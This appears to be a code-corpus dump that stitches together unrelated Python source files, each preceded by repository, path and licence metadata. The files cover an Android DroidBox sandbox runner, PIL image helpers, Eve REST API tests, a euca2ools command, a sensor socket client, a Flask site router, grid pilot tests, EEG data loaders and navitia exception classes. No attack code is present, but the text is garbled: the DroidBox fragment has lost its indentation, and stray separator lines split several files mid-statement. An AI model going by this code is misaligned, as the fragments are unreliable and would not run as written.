# No packages identified? Return an error
if package_name == None:
            print("No package found. Terminate the analysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=None,
cwd=os.path.dirname(os.path.realpath(__file__)))
if (ret == 1):
print("Failed to execute the application.")
sys.exit(1)
        print("Starting the activity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.adb is None:
self.adb = Popen(["adb", "logcat", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.adb.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.adb is not None:
self.adb.terminate()
self.adb = None
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
count = CountingThread()
count.start()
timeStamp = time.time()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.adb is None:
self.adb = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
from droidbot.state_monitor import StateMonitor
state_monitor = StateMonitor()
state_monitor.start()
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >=5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
|
sintrb/urlimg
|
img/funs.py
|
Python
|
gpl-2.0
| 2,541
| 0.006528
|
# -*- coding: UTF-8 -*-
'''
Created on 18 January 2015
@author: RobinTang
'''
try:
import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter
except:
pass
import StringIO
filters = {
('blur', ImageFilter.BLUR, '模糊滤镜'),
('contour', ImageFilter.CONTOUR, '轮廓'),
('edge_enhance', ImageFilter.EDGE_ENHANCE, '边界加强'),
('edge_enhance_more', ImageFilter.EDGE_ENHANCE_MORE, '边界加强(阀值更大)'),
('emboss', ImageFilter.EMBOSS, '浮雕滤镜'),
('find_edges', ImageFilter.FIND_EDGES, '边界滤镜'),
('smooth', ImageFilter.SMOOTH, '平滑滤镜'),
('smooth_more', ImageFilter.SMOOTH_MORE, '平滑滤镜(阀值更大)'),
('sharpen', ImageFilter.SHARPEN, '锐化滤镜'),
}
filtersmap = dict([(v[0], (v[1], v[2])) for v in filters])
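# Illustrative sketch, not part of the original module: filtersmap maps a short
# name to a (PIL filter, description) pair, so a filter can be applied by name.
# The key 'blur' is just an example entry from the table above.
def example_apply_filter(m, name='blur'):
    imgfilter, desc = filtersmap[name]
    return m.filter(imgfilter)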
def getfont(size):
import os, sys
try:
file_name = os.path.dirname(sys.modules['img'].__file__)
|
path = os.path.abspath(file_name)
except:
path = ''
font = ImageFont.truetype(os.path.join(path, "font.ttf"), size)
return font
def fitto(src, dw=360, dh=200):
dst = Image.new("RGBA", (dw, dh), (255, 255, 255, 0))
    sw = src.size[0]
sh = src.size[1]
kw = float(sw) / float(dw)
kh = float(sh) / float(dh)
w, h = 0, 0
if kw > kh:
w, h = int(dw), int(sh / kw)
else:
w, h = int(sw / kh), int(dh)
nsrc = src.resize((w, h),)
x = (dw - w) / 2
y = (dh - h) / 2
dst.paste(nsrc, (x, y, x + w, y + h))
return dst
def watermark(m, s, color=(0, 0, 0, 255), size=20):
draw = ImageDraw.Draw(m)
font = getfont(size)
fsize = font.getsize(s)
draw.text((m.size[0] - fsize[0] - fsize[1] / 5, m.size[1] - fsize[1]), s, font=font, fill=color)
return m
def getimg(path):
if path.startswith("http://") or path.startswith("https://"):
import urllib2
import io
dats = io.BytesIO(urllib2.urlopen(path).read())
m = Image.open(dats)
# dats.close()
return m
else:
return Image.open(path)
def getimgwithdats(dats):
m = Image.open(dats)
return m
def getimgbytes(m, fmt="png"):
out = StringIO.StringIO()
m.save(out, fmt)
out.seek(0)
dats = out.read()
out.close()
return dats
if __name__ == "__main__":
m = getimg("http://img0.bdstatic.com/img/image/shouye/xinshouye/meishi116.jpg")
m = fitto(m, 300, 300)
m = watermark(m, "Powered by Sin")
m.show()
|
drptbl/webium
|
webium/settings.py
|
Python
|
apache-2.0
| 251
| 0
|
from selenium.webdriver import Firefox
from selenium.webdriver.common.by import By
driver_class = Firefox
implicit_timeout = 30
wait_timeout = 30
default_search_type = By.ID
try:
from local_webium_settings import *
except ImportError:
pass
| |
jzorrof/eve
|
eve/tests/methods/patch.py
|
Python
|
bsd-3-clause
| 25,507
| 0
|
from bson import ObjectId
import simplejson as json
from eve.tests import TestBase
from eve.tests.test_settings import MONGO_DBNAME
from eve.tests.utils import DummyEvent
from eve import STATUS_OK, LAST_UPDATED, ID_FIELD, ISSUES, STATUS, ETAG
from eve.methods.patch import patch_internal
class TestPatch(TestBase):
def test_patch_to_resource_endpoint(self):
_, status = self.patch(self.known_resource_url, data={})
self.assert405(status)
def test_readonly_resource(self):
_, status = self.patch(self.readonly_id_url, data={})
self.assert405(status)
def test_unknown_id(self):
_, status = self.patch(self.unknown_item_id_url,
data={"key1": 'value1'})
self.assert404(status)
def test_unknown_id_different_resource(self):
# patching a 'user' with a valid 'contact' id will 404
_, status = self.patch('%s/%s/' % (self.different_resource,
self.item_id),
data={"key1": "value1"})
self.assert404(status)
# of course we can still patch a 'user'
_, status = self.patch('%s/%s/' % (self.different_resource,
self.user_id),
data={'key1': '{"username": "username1"}'},
headers=[('If-Match', self.user_etag)])
self.assert200(status)
def test_by_name(self):
_, status = self.patch(self.item_name_url, data={'key1': 'value1'})
self.assert405(status)
def test_ifmatch_missing(self):
_, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert403(status)
def test_ifmatch_disabled(self):
self.app.config['IF_MATCH'] = False
r, status = self.patch(self.item_id_url, data={'key1': 'value1'})
self.assert200(status)
self.assertTrue(ETAG not in r)
def test_ifmatch_bad_etag(self):
_, status = self.patch(self.item_id_url,
data={'key1': 'value1'},
headers=[('If-Match', 'not-quite-right')])
self.assert412(status)
def test_unique_value(self):
# TODO
# for the time being we are happy with testing only Eve's custom
# validation. We rely on Cerberus' own test suite for other validation
# unit tests. This test also makes sure that response status is
        # syntactically correct in case of validation issues.
# We should probably test every single case as well (seems overkill).
r, status = self.patch(self.item_id_url,
data={"ref": "%s" % self.alt_ref},
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'ref': "value '%s' is not unique" %
self.alt_ref})
def test_patch_string(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_integer(self):
field = "prog"
test_value = 9999
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_list_as_array(self):
field = "role"
test_value = ["vendor", "client"]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertTrue(set(test_value).issubset(db_value))
def test_patch_rows(self):
field = "rows"
test_value = [
{'sku': 'AT1234', 'price': 99},
{'sku': 'XF9876', 'price': 9999}
]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
for test_item in test_value:
            self.assertTrue(test_item in db_value)
    def test_patch_list(self):
field = "alist"
test_value = ["a_string", 99]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_dict(self):
field = "location"
test_value = {'address': 'an address', 'city': 'a city'}
changes = {field: test_value}
original_city = []
def keep_original_city(resource_name, updates, original):
original_city.append(original['location']['city'])
self.app.on_update += keep_original_city
self.app.on_updated += keep_original_city
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
self.assertEqual(original_city[0], original_city[1])
def test_patch_datetime(self):
field = "born"
test_value = "Tue, 06 Nov 2012 10:33:31 GMT"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_objectid(self):
field = "tid"
test_value = "4f71c129c88e2018d4000000"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_null_objectid(self):
# verify that #341 is fixed.
field = "tid"
test_value = None
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_defaults(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title', r)
def test_patch_defaults_with_post_override(self):
field = "ref"
test_value = "1234567890123456789012345"
r = self.perform_patch_with_post_override(field, test_value)
self.assert200(r.status_code)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title',
json.loads(r.get_data()))
def test_patch_multiple_fields(self):
fields = ['ref', 'prog', 'role']
test_values = ["9876543210987654321054321", 123, ["agent"]]
changes = {"ref": test_values[0], "prog": test_values[1],
"role": test_values[2]}
r = self.perform_patch(changes)
db_values = self.compare_patch_with_get(fields, r)
for i in range(len(db_values)):
self.assertEqual(db_values[i], test_values[i])
def test_patch_with_post_override(self):
# a POST request with PATCH override turns into a PATCH request
r = self.perform_patch_with_post_override('prog', 1)
self.assert200(r.status_code)
def test_patch_internal(self):
# test that patch_internal is available and working properly.
test_field = 'ref'
test_value = "9876543210987654321098765"
data = {test_field: test_value}
with self.app.test_request_context(self.item_id_url):
r, _, _, status = patch_internal(
self.known_resource, data, concurrency_check=False,
**{'_id': self.item_id})
db_value = self.compare_patch_with_get(test_field, r)
self.assertEqual(db_value, test_value)
self.assert200(status)
def test_patch_etag_header(self):
        # test that Etag is always included in the response header. See #562.
changes = {"ref": "1234567890123456789012345"}
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
|
jhajek/euca2ools
|
euca2ools/commands/ec2/describebundletasks.py
|
Python
|
bsd-2-clause
| 2,642
| 0
|
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.ec2 import EC2Request
from requestbuilder import Arg, Filter
class DescribeBundleTasks(EC2Request):
DESCRIPTION = 'Describe current instance-bundling tasks'
ARGS = [Arg('BundleId', metavar='BUNDLE', nargs='*',
help='limit results to specific bundle tasks')]
FILTERS = [Filter('bundle-id', help='bundle task ID'),
Filter('error-code',
help='if the task failed, the error code returned'),
Filter('error-message',
help='if the task failed, the error message returned'),
Filter('instance-id', help='ID of the bundled instance'),
Filter('progress', help='level of task completion, in percent'),
Filter('s3-bucket',
help='bucket where the image will be stored'),
Filter('s3-prefix', help='beginning of the bundle name'),
Filter('start-time', help='task start time'),
Filter('state', help='task state'),
Filter('update-time', help='most recent task update time')]
LIST_TAGS = ['bundleInstanceTasksSet']
def print_result(self, result):
for task in result.get('bundleInstanceTasksSet', []):
self.print_bundle_task(task)
|
servee/django-servee-oldcontrib
|
oldcontrib/media/document/forms.py
|
Python
|
bsd-3-clause
| 190
| 0.010526
|
from django import forms
from oldcontrib.media.document.models import Document
class DocumentUpload(forms.ModelForm):
class Meta:
model = Document
|
fields = ('document',)
|
TeamProxima/predictive-fault-tracker
|
board/board_manager.py
|
Python
|
mit
| 2,638
| 0.003412
|
import json
import socket
from comms_manager import CommsManager
from constants import *
class BoardManager:
def __init__(self, args):
self.server_address = (args.IP, args.PORT)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.sock.connect(self.server_address)
self.cm = CommsManager(args.TO, args.FROM, args.TWKEY)
def activate(self):
"""
        Continuously feeds the server with sensor data and responds to training requests
"""
while True:
try:
|
humidity, temperature = self.cm.take_single_sample()
packet = json.dumps({'scores': {'temperature': temperature,
'humidity': humidity}})
self.sock.send(packet)
resp = self.sock.recv(1024)
|
if resp:
resp = json.loads(resp)
if resp['response'] == -1:
self.cm.send_sms(
message='There is a temperature problem at station 2. For detailed'
' info siemenshackathon://scheme.net.siemenshackathon')
self.cm.blink(2, 17)
if resp['responsesound'] == -1:
self.cm.send_sms(
message='There might be a malfunction at station 2. For detailed '
'info siemenshackathon://scheme.net.siemenshackathon')
self.cm.buzzer(2, 26)
if len([key for key, value in resp.iteritems() if key == 'train']):
# Train command makes a quick training through environment and sends
# results back
self.cm.take_sample(20, 'temperature', 'humidity')
# 'npy' field notify server for incoming training files
# Only temperature data used for ML
self.sock.send(json.dumps({'npy': 1, 'humid_file_name': HUMIDITY_DATA_FILE,
'temp_file_name': TEMPERATURE_DATA_FILE}))
fdesc = open(TEMPERATURE_DATA_FILE, 'rb')
data = fdesc.read(1024)
while data:
self.sock.send(data)
data = fdesc.read(1024)
fdesc.close()
except Exception as e:
print 'Error occurred during sending file: ', str(e)
continue
|
cacahootie/deckmaster
|
deckmaster/app/process_site.py
|
Python
|
mit
| 4,475
| 0.007374
|
"""Process `site.json` and bower package tools."""
import os
import json
import subprocess
from functools import partial
import importlib
import sys
from flask import Flask, render_template, g, redirect, current_app
from gitloader import git_show
from import_code import import_code
try:
from app import app
except ImportError:
from deckmaster.app import app
sys.path.append('.')
component_dir = 'static/components'
bower_str = 'bower install --config.directory="%s" %s > /dev/null'
def get_pkg_dir(package):
"""Join the component and package directory."""
return os.path.join(component_dir, package)
def get_pkg_main(package):
"""Check `package.json` then `bower.json` for the main included file."""
pkg = json.load(
open(os.path.join(get_pkg_dir(package), 'bower.json'))
)
if isinstance(pkg['main'],list):
return [os.path.join(get_pkg_dir(package), p) for p in pkg['main']]
else:
return os.path.join(get_pkg_dir(package), pkg['main'])
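# Illustrative note, not part of the original module: get_pkg_main mirrors the
# 'main' field of the package's bower.json, so it returns either a single path
# such as 'static/components/jquery/dist/jquery.js' or a list of paths when
# 'main' lists several files (the package name here is only an example).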
def check_pkg(package):
    """Check if the package exists; if not, use bower to install."""
if not os.path.exists(os.path.join(component_dir, package)):
subprocess.call(
bower_str % (component_dir, package),
shell = True
)
return True
def script_or_style(path):
if path.endswith('js'):
return 'script'
elif path.endswith('css'):
return 'style'
else:
print "Script or style? " + path
def process_bower(deps):
retval = {'styles':[], 'scripts':[]}
try:
for pkg in deps['bower']:
check_pkg(pkg)
main = get_pkg_main(pkg)
if isinstance(main,list):
pkgassets = {}
for path in reversed(main):
try:
pkgassets[script_or_style(path)+'s'] = [path]
except TypeError:
pass
retval['scripts'] += pkgassets['scripts']
retval['styles'] += pkgassets['styles']
else:
retval[script_or_style(main)+'s'].append(main)
except KeyError:
pass
return retval
def process_local(deps):
retval = {'styles':[], 'scripts':[]}
try:
for path in deps['local']:
retval[script_or_style(path)+'s'].append(path)
except KeyError:
pass
return retval
def process_deps(deps):
    """Process script element in the config for local vs bower components."""
    local, bower = process_local(deps), process_bower(deps)
retval = {}
for tag in local:
retval[tag] = local[tag] + bower[tag]
return retval
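# Illustrative sketch, not part of the original module: the `deps` mapping may
# name bower packages and local asset files; process_deps merges both sources
# into 'scripts' and 'styles' lists.  The package and file names are examples.
def example_process_deps():
    deps = {
        'bower': ['jquery'],
        'local': ['static/app.js', 'static/app.css'],
    }
    return process_deps(deps)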
def process_route(route):
if not route.get('view'):
def route_handler(revid = None, path = None):
g.revid = revid
try:
return render_template(
'html/base.html', **process_deps(route['deps'])
)
except AttributeError:
return 'Not Found', 404
return route_handler
mname, fname = route['view'].rsplit('.', 1)
module = importlib.import_module(mname)
viewfunc = getattr(module, fname)
def route_handler(revid = None, path = None):
if revid is not None:
codestr = git_show('./views.py', revid)
mod = import_code(codestr, mname)
return getattr(mod,fname)()
return viewfunc()
return route_handler
def lazy_router(revid, path = None):
g.revid = revid
if path is None:
path = ''
if not path.startswith('/'):
path = '/' + path
cfgstr = git_show('./site.json', revid)
try:
return process_route(json.loads(cfgstr)[path])(revid, path)
except KeyError:
print cfgstr
def process_site(site = None, revid = None):
"""Process `site.json` based on the config and CLI options."""
if site is None:
try:
site = json.load(open('site.json'))
except IOError:
return []
if 'deps' in site:
return [
('/', 'index', process_route(site)),
('/<revid>/', 'index_revid', process_route(site)),
]
retval = [
('/favicon.ico', 'favicon', lambda: ''),
('/<revid>/', 'revid_lazy_index', lazy_router),
('/<revid>/<path:path>', 'revid_lazy', lazy_router),
]
for rt in site:
retval.append((rt, 'index' if rt=='/' else rt, process_route(site[rt])))
return retval
|
wkrzemien/Pilot
|
Pilot/tests/Test_Pilot.py
|
Python
|
gpl-3.0
| 4,260
| 0.006103
|
""" Test class for Pilot
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
# imports
import unittest
import json
import stat
import sys
import os
import shutil
from Pilot.pilotTools import PilotParams
from Pilot.pilotCommands import CheckWorkerNode, ConfigureSite, NagiosProbes
class PilotTestCase(unittest.TestCase):
""" Base class for the Agents test cases
"""
def setUp(self):
# Define a local file for test, and all the necessary parameters
with open('pilot.json', 'w') as fp:
json.dump({'Setups': {'TestSetup': {'Commands': {'cetype1': 'x,y, z',
|
'cetype2': ['d', 'f']},
'CommandExtensions': 'TestExtension1,TestExtension2',
'NagiosProbes': 'Nagios1,Nagios2',
'NagiosPutURL': 'https://127.0.0.2/',
'Version': 'v1r1, v2r2'
|
}
},
'CEs': {'grid1.example.com': {'GridCEType': 'cetype1', 'Site': 'site.example.com'}},
'DefaultSetup': 'TestSetup'},
fp)
def tearDown(self):
for fileProd in [
'pilot.json',
'Nagios1',
'Nagios2',
'PilotAgentUUID',
'dev.tgz',
'pilot.out',
'123.txt',
'testing.tgz']:
try:
os.remove(fileProd)
except OSError:
pass
try:
shutil.rmtree('ReplacementCode')
except OSError:
pass
class CommandsTestCase(PilotTestCase):
""" Test case for each pilot command
"""
def test_InitJSON(self):
""" Test the pilot.json and command line parsing
"""
sys.argv[1:] = ['--Name', 'grid1.example.com', '--commandOptions', 'a=1,b=2', '-Z', 'c=3']
pp = PilotParams()
self.assertEqual(pp.commands, ['x', 'y', 'z'])
self.assertEqual(pp.commandExtensions, ['TestExtension1', 'TestExtension2'])
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions', 'a = 1, b=2', '-Z', ' c=3'] # just some spaces
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions=a = 1, b=2', '-Z', ' c=3'] # spaces and '=''
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
def test_CheckWorkerNode(self):
""" Test CheckWorkerNode command
"""
pp = PilotParams()
cwn = CheckWorkerNode(pp)
res = cwn.execute()
self.assertEqual(res, None)
def test_ConfigureSite(self):
""" Test ConfigureSite command
"""
pp = PilotParams()
pp.configureScript = 'echo'
cs = ConfigureSite(pp)
res = cs.execute()
self.assertEqual(res, None)
def test_NagiosProbes(self):
""" Test NagiosProbes command
"""
pp = PilotParams()
nagios = NagiosProbes(pp)
with open('Nagios1', 'w') as fp:
fp.write('#!/bin/sh\necho 123\n')
os.chmod('Nagios1', stat.S_IRWXU)
with open('Nagios2', 'w') as fp:
fp.write('#!/bin/sh\necho 567\n')
os.chmod('Nagios2', stat.S_IRWXU)
nagios.execute()
self.assertEqual(nagios.nagiosProbes, ['Nagios1', 'Nagios2'])
self.assertEqual(nagios.nagiosPutURL, 'https://127.0.0.2/')
#############################################################################
# Test Suite run
#############################################################################
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(PilotTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(CommandsTestCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
DryRun/seizures
|
code/dataIO.py
|
Python
|
gpl-3.0
| 3,438
| 0.041303
|
import scipy.io
import scipy.signal
import os
import sys
import matplotlib
import pandas as pd
import numpy as np
import random
# Load a matlab file into a data panel
# subject = Patient_N or Dog_N
# segment_type = interictal, ictal, or test
# downsample = True or False
# train_fraction = 0 < # <1, fraction of data to split into training and internal testing. This is ignored if segment_type = test.
def LoadMAT(subject, downsample):
dir = '/Users/dryu/Documents/DataScience/Seizures/data/clips/'+ subject + '/'
dict = {}
#load files in numerical order
files = os.listdir(dir)
files2 =[]
for i in range(len(files)):
qp = files[i].rfind('_') +1
        files2.append( files[i][0:qp] + (10-len(files[i][files[i].rfind('_')+1:]) )*'0' + files[i][qp:] )
#print len(files), len(files2)
t = {key:value for key, value in zip(files2,files)}
files2 = t.keys()
files2.sort()
f = [t[i] for i in files2]
j = 0
for i in f:
        seg = i[i.rfind('_')+1 : i.find('.mat')] # Number of segment, e.g. Dog_1_interictal_segment_250.mat => 250
segtype = i[i[0:i.find('_segment')].rfind('_')+1: i.find('_segment')] # Type of segment: ictal, interictal, test
d = scipy.io.loadmat(dir+i)
if j==0:
cols = range(len(d['channels'][0,0]))
cols = cols +['time']
if segtype == 'interictal' or segtype == "test":
l = -3600.0#np.nan
else:
#print i
l = d['latency'][0]
df = pd.DataFrame(np.append(d['data'].T, l+np.array([range(len(d['data'][1]))]).T/d['freq'][0], 1 ), index=range(len(d['data'][1])), columns=cols)
if downsample:
if np.round(d['freq'][0]) == 5000:
df = df.groupby(lambda x: int(np.floor(x/20.0))).mean()
if np.round(d['freq'][0]) == 500:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
if np.round(d['freq'][0]) == 400:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
df['time'] = df['time'] - (df['time'][0]-np.floor(df['time'][0]))*(df['time'][0] > 0)
dict.update({segtype+'_'+seg : df})
j = j +1
data = pd.Panel(dict)
return data
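# Illustrative note, not part of the original code: the Panel returned above is
# keyed by "<segment type>_<segment number>", e.g. "interictal_250", and each
# item is a DataFrame with one column per channel plus a 'time' column.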
def MATToPickle(subject, downsample):
print "Welcome to MATToPickle(" + subject + ", ",
if downsample:
print "True",
else:
print "False",
print ")"
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename = pickle_filename + ".pkl"
SavePanelAsPickle(LoadMAT(subject, downsample), pickle_filename)
def SavePanelAsPickle(data, pickle_filename):
data.to_pickle(pickle_filename)
def LoadPanelFromPickle(subject, downsample):
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename += ".pkl"
return pd.read_pickle(pickle_filename)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description = 'Process input data into pandas pickles')
parser.add_argument('subjects', type=str, help='Subject, or all to do all subjects')
parser.add_argument('--downsample', action='store_true', help='Downsample data')
args = parser.parse_args()
if args.subjects == "all":
subjects = ['Dog_1','Dog_2', 'Dog_3', 'Dog_4', 'Patient_1', 'Patient_2', 'Patient_3', 'Patient_4','Patient_5','Patient_6','Patient_7','Patient_8',]
else:
subjects = [args.subjects]
for subject in subjects:
MATToPickle(subject, args.downsample)
|
xlqian/navitia
|
source/jormungandr/jormungandr/exceptions.py
|
Python
|
agpl-3.0
| 5,255
| 0.001713
|
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from flask import request
from werkzeug.exceptions import HTTPException
import logging
from jormungandr.new_relic import record_exception
__all__ = ["RegionNotFound", "DeadSocketException", "ApiNotFound", "InvalidArguments"]
def format_error(code, message):
error = {"error": {"id": code, "message": message}, "message": message}
return error
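# Illustrative sketch, not part of the original module: the payload produced by
# format_error for an example identifier and message.
def _example_format_error():
    # returns {"error": {"id": "unknown_object", "message": "..."},
    #          "message": "..."}
    return format_error("unknown_object", "No region nor coordinates given")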
class RegionNotFound(HTTPException):
def __init__(self, region=None, lon=None, lat=None, object_id=None, custom_msg=None):
super(RegionNotFound, self).__init__()
self.code = 404
if custom_msg:
self.data = format_error("unknown_object", custom_msg)
return
if object_id:
if object_id.count(";") == 1:
lon, lat = object_id.split(";")
object_id = None
elif object_id[:6] == "coord:":
lon, lat = object_id[6:].split(":")
object_id = None
if not any([region, lon, lat, object_id]):
self.data = format_error("unknown_object", "No region nor " "coordinates given")
elif region and not any([lon, lat, object_id]):
self.data = format_error("unknown_object", "The region {0} " "doesn't exists".format(region))
elif not any([region, object_id]) and lon and lat:
self.data = format_error(
"unknown_object",
"No region available for the coordinates:" "{lon}, {lat}".format(lon=lon, lat=lat),
)
elif region == lon == lat is None and object_id:
self.data = format_error("unknown_object", "Invalid id : {id}".format(id=object_id))
else:
self.data = format_error("unknown_object", "Unable to parse region")
def __str__(self):
return repr(self.data['message'])
class DeadSocketException(HTTPException):
def __init__(self, region, path):
super(DeadSocketException, self).__init__()
error = 'The region {} is dead'.format(region)
self.data = format_error("dead_socket", error)
self.code = 503
class ApiNotFound(HTTPException):
def __init__(self, api):
super(ApiNotFound, self).__init__()
error = 'The api {} doesn\'t exist'.format(api)
self.data = format_error("unknown_object", error)
self.code = 404
class UnknownObject(HTTPException):
def __init__(self, msg):
super(UnknownObject, self).__init__()
error = 'The object {} doesn\'t exist'.format(msg)
self.data = format_error("unknown_object", error)
self.code = 404
class InvalidArguments(HTTPException):
def __init__(self, arg):
super(InvalidArguments, self).__init__()
self.data = format_error("unknown_object", "Invalid arguments " + arg)
self.code = 400
class UnableToParse(HTTPException):
def __init__(self, msg):
super(UnableToParse, self).__init__()
self.data = format_error("unable_to_parse", msg)
self.code = 400
class TechnicalError(HTTPException):
def __init__(self, msg):
super(TechnicalError, self).__init__()
self.data = format_error("technical_error", msg)
self.code = 500
class ConfigException(Exception):
def __init__(self, arg):
super(ConfigException, self).__init__(arg)
